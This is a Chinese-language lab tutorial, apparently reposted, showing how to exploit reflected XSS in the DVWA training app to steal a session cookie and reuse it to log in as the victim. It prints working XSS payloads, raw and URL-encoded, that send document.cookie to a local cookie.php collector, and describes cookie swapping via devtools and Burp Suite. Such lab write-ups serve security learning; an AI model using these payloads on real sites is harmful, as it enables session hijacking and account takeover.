dvwa下利用xss獲取cookie並利用(繞過驗證)


一、准備

首先呢,需要先有一個dvwa的靶場,我這里是在本地搭建了一個,先訪問127.0.0.1,正常用戶名密碼登錄

這里就以low級別進行操作

 二、獲取cookie

 選擇反射型xss題目,先使用彈窗測試一下<script>alert(123)</script>

 

 確定可以使用代碼之后,在搭建的服務器目錄下創建一個cookie.php,我這里是C:\wamp\www(僅供參考)

 

 

 目的是為了將獲取到的cookie,保存到cookie.php所在目錄下自動生成一個cookie.txt

接下來需要根據題目構造js語句

<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>  #語句是跳轉執行訪問指定的文件, 並在url中顯示cookie

使用js語句獲取cookie的兩種方式:

第一種方式:url欄輸入,進行url編碼

原始URL:
http://location/dvwa/vulnerabilities/xss_r/?name=
<script>doument.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>
需要進行URL編碼:
http://localhost/dvwa/vulnerabilities/xss_r/?name=
%3Cscript%3Edocument.location%3D%27http%3A%2f%2f127.0.0.1%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E#

第二種方式是在xss注入處直接些參數

<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>

 

 

 

提交,成功的話會跳轉到另一個界面

 

 

 

現在我先查看一下文件目錄,可以看到是已經成功創建了一個名為cookie.txt的文本

 

 另外能夠看到瀏覽器url框內有一個cookie的值

 三、攻擊者利用獲取到的cookie登錄到受害者的賬戶

第一種方式:修改瀏覽器記錄的cookie

獲取到cookie后打開另外一個瀏覽器訪問dvwa(此瀏覽器用別的賬號登陸過DVWA,所以瀏覽器有對應的cookie格式)(因為本地搭建原因,除非重新打開瀏覽器,否則cookie不能正常刷新,所以直接打開另一個瀏覽器方便一些),f12打開開發者工具,找到cookie值。

 修改cookie為獲取的cookie 並將security 設為low ,然后輸入目標用戶的ID和密碼登陸目標用戶,

 

 

 

 

 

第二種方式:使用burpsuite 抓包,改包, 

 

 ok,已經成功利用獲取到的cookie進行登錄

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM